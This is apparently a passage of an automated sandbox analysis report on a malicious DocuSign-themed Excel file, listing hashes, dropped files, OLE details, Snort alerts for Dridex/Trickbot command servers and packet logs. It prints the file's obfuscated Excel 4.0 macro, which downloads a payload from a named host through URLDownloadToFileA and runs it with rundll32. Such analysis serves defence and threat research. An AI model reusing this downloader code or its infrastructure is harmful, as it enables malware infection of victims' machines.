| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
05af1f5ca1b87cc9cc9b25185115607d | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
8c4a22651d328568ec66382a84fc505f | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
C:\Users\user\BASE.BABAA | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Created / dropped Files |
---|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 59134 |
Entropy (8bit): | 7.995450161616763 |
Encrypted: | true |
SSDEEP: | 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk |
MD5: | E92176B0889CC1BB97114BEB2F3C1728 |
SHA1: | AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443 |
SHA-256: | 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3 |
SHA-512: | CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 893 |
Entropy (8bit): | 7.366016576663508 |
Encrypted: | false |
SSDEEP: | 24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x |
MD5: | D4AE187B4574036C2D76B6DF8A8C1A30 |
SHA1: | B06F409FA14BAB33CBAF4A37811B8740B624D9E5 |
SHA-256: | A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7 |
SHA-512: | 1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.0908522464605643 |
Encrypted: | false |
SSDEEP: | 6:kKwaPbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:3W3kPlE99SNxAhUeo+aKt |
MD5: | DBAC0F4F367066518103C7836B446107 |
SHA1: | 624845187C47C0AB5B186CFFD05A74E7FA8D7A71 |
SHA-256: | 283E817992CADBAF9E3198C1B7181C08D172F7719C2ACDD25F5806891A41E374 |
SHA-512: | 9B3ACF465E611D6BCB8206F160B704FDFE7B24D1436FFCA21B64E744A1750F5EED0B508769193876CBA13EE544F62F64140EC4DA48E6F9554E872C2B11EA31B0 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 252 |
Entropy (8bit): | 3.018531379206123 |
Encrypted: | false |
SSDEEP: | 3:kkFklYQltfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKtwnliBAIdQZV7eAYLit |
MD5: | 89B0055866A7A1585BBC1D3FAE86B411 |
SHA1: | FB63F73ADD62C9D5957D10076F740E9CC1AAEABF |
SHA-256: | 6D57DC7645218A8D6260AA82625BD20D81AD51810CFD7EA71909CFF154F3FFCD |
SHA-512: | C0E2214F8CA852832058F16A669707C408BD442203926DD656E4007430AED448480FFDA6F0185DF488A97C73CF786F12114911B88D77F8B0DE8C4DE9CA8B7C70 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | moderate, very likely benign file |
IE Cache URL: | http://www.chipmania.it/mails/open.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 155530 |
Entropy (8bit): | 7.660456700199465 |
Encrypted: | false |
SSDEEP: | 3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXs:YEGSzx0dmxk7RbsYsKtseoXc |
MD5: | 0395050B4CB895A16AD84F8E70C521ED |
SHA1: | 4B7903E8FF8F55C8A2B2C677A715411F2AA1558B |
SHA-256: | F9A0EA7DBEC7B9BEBA16AEB7412DF72087B2736159C3B2F314A8978B5DC42504 |
SHA-512: | C34CCB734CD14F5C286A2B071822392274BD282E8AF45A3388CBBA60CD4D54FC2B8D9544ADB8F6088116DDF3197E3204A6255CD1E7959023CA9E84FB2DD10D8B |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 59134 |
Entropy (8bit): | 7.995450161616763 |
Encrypted: | true |
SSDEEP: | 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk |
MD5: | E92176B0889CC1BB97114BEB2F3C1728 |
SHA1: | AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443 |
SHA-256: | 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3 |
SHA-512: | CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 152788 |
Entropy (8bit): | 6.316654432555028 |
Encrypted: | false |
SSDEEP: | 1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx |
MD5: | 64FEDADE4387A8B92C120B21EC61E394 |
SHA1: | 15A2673209A41CCA2BC3ADE90537FE676010A962 |
SHA-256: | BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745 |
SHA-512: | 655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.4909932927770635 |
Encrypted: | false |
SSDEEP: | 12:85QPLgXg/XAlCPCHaXtB8XzB/EZX+WnicvbxbDtZ3YilMMEpxRljK2yTdJP9TdJ2:85g/XTd6jcYexDv3qorNru/ |
MD5: | 8DF148F3815C0B837F9F65372D9F60DE |
SHA1: | FE0773621E78C194705ED2D750D6C61E38798B52 |
SHA-256: | CAF7FD7A666F328EA44EDEE05FFD72EBF1630D20D0A7F16C55368C6435FA6318 |
SHA-512: | B7EB5B5AFBABB509274B1C316A86C9E6BF98C32578E14E9DE822EA6F95F3EA83FCA53723D7573E626EE14D338C280E7ED06B6CD416A207719864B1DF9FEDFC80 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 4.51897634649714 |
Encrypted: | false |
SSDEEP: | 48:88/XT0jFQ0UsRrjseoQh28/XT0jFQ0UsRrjseoQ/:88/XojFPVaeoQh28/XojFPVaeoQ/ |
MD5: | 40AE1E67959F6C25580AC86D5CEBC988 |
SHA1: | F9322AE7CC8ED6A5AE3414395825A06D5EC5E7CB |
SHA-256: | 66CFB660637CE724FF36FD6B4A9990FDA673850A66675A0CD2E1CBFD3F93E20E |
SHA-512: | A24A8EF12A9CB3A9FC84D8924B0617C52BE92639E66145DB750CA558AC69A4DEB7AE2FCD8844D43A1FC5FDE6896CBED5738D79CD718BD96AB2EA36E3EA662F46 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 128 |
Entropy (8bit): | 4.778615550495196 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM31Sc4WlGLp5ou61Sc4WlGLp5omM31Sc4WlGLp5ov:dj6B48GLjq48GLj6B48GLjy |
MD5: | 0D88D7CE0967F3A218BE93F1D36468E5 |
SHA1: | 7EF372347F3AB3BC9B3E654514D8135AC439969D |
SHA-256: | 6E9FB0FFDE32626B85529A6208E8D92DE1689E21FA3C1C9DDDE6583CB0DD672A |
SHA-512: | BABE7C0A314E6E1517C21E375B26702EEA555C815079A2425D07658FAF77D8661B7C1CF5FBAB4BF46DEDC31640A6F9F7900638C377EF196C549A66CD7B063136 |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | modified |
Size (bytes): | 44097 |
Entropy (8bit): | 4.619647921372402 |
Encrypted: | false |
SSDEEP: | 768:4M8HPEPkfGb84St9cpE4MFjZkD7+M0dzB/:4XEPkg8wpQFj2xOx |
MD5: | F6234413A6939052C8D6016F51F91FDD |
SHA1: | 2B6E05F008F3731645591FF7D8CC498C235D8F42 |
SHA-256: | 1B53D60162FDC0F76D3F0383D260B7E99F44A57B3701A43201C5F431B46767D7 |
SHA-512: | 6886658E215ABCFA2759050B37E659F9B560B977A201C93A5AD569937186CFAFB6AAC962E2C96B66E47D3E636416FF126A04794B2E7E0202D50FA9D28F973F87 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 177025 |
Entropy (8bit): | 7.23997439179864 |
Encrypted: | false |
SSDEEP: | 3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2Qn6:4cKoSsxzNDZLDZjlbR868O8KL5L+4iKm |
MD5: | D1687A16F98FF1BB03332A1B51A7D562 |
SHA1: | BC5ED54E93854F8DD1C53A223933E618C3F2FD3D |
SHA-256: | E1EC0D28B845F902FC5B3FCE22354EA72C993D9FF36ED6DF72C8B7782A0336F4 |
SHA-512: | C4444D5C63EE2FD6B6082B6C416FCE44E0A177C09A205CF67CC92C1145363FC9C141A1840B2EC94DBB58E8037949AB7D53667148F0BD988432B7EB3D7E3A6190 |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.195172018000313 |
TrID: |
|
File name: | Sign-1870635479_637332644.xls |
File size: | 168960 |
MD5: | ecd29fe79bd4e7f1bae3ccd26f44397c |
SHA1: | a4e2f0650ac7b4642d43e0c0fbae293ce77a7a40 |
SHA256: | 77500283a6b0da3b616525a210b9fb82ab4dfde174a48ce4bad593c722a6cbb4 |
SHA512: | 49050a99a9803e8e525f18de609457dbb7146d2d5f8ff559c40545eb72f6f57a5046f56da0d984f709cdfd17f999f99b672017d8aab57d39439592d53dbd9a47 |
SSDEEP: | 3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMd:OcKoSsxzNDZLDZjlbR868O8KlVH3jiK0 |
File Content Preview: | ........................>.......................H...........................E...F...G.......................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "Sign-1870635479_637332644.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-19 10:48:36 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 917504 |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.351244264199 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.253278926706 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 157800 |
Entropy: | 7.46869820242 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . |
Data Raw: | 09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
"=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
02/20/21-09:48:19.250919 | TCP | 2404332 | ET CNC Feodo Tracker Reported CnC Server TCP group 17 | 49166 | 443 | 192.168.2.22 | 45.155.173.242 |
02/20/21-09:49:05.777178 | TCP | 2404320 | ET CNC Feodo Tracker Reported CnC Server TCP group 11 | 49170 | 443 | 192.168.2.22 | 193.8.194.96 |
02/20/21-09:49:06.177721 | TCP | 2021013 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) | 443 | 49170 | 193.8.194.96 | 192.168.2.22 |
02/20/21-09:49:16.239937 | TCP | 2021013 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) | 443 | 49173 | 193.8.194.96 | 192.168.2.22 |
02/20/21-09:49:17.240764 | TCP | 2404336 | ET CNC Feodo Tracker Reported CnC Server TCP group 19 | 49174 | 447 | 192.168.2.22 | 5.202.150.151 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 20, 2021 09:48:08.051196098 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.113799095 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.113904953 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.114717007 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.174257040 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181039095 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181072950 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181091070 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181107044 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181123972 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181132078 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.181143045 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181160927 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181168079 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.181173086 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.181179047 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181195974 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181200027 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.181216002 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181220055 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.181241035 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.181257010 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.187596083 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.239954948 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.239994049 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240011930 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240034103 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240039110 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240051985 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240066051 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240071058 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240072012 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240073919 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240082026 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240088940 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240108967 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240113020 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240119934 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240128994 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240137100 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240151882 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240170956 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240174055 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240181923 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240194082 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240211010 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240211010 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240226030 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240231991 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240245104 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240267992 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240288019 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240308046 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240328074 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240329981 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240349054 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240365028 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
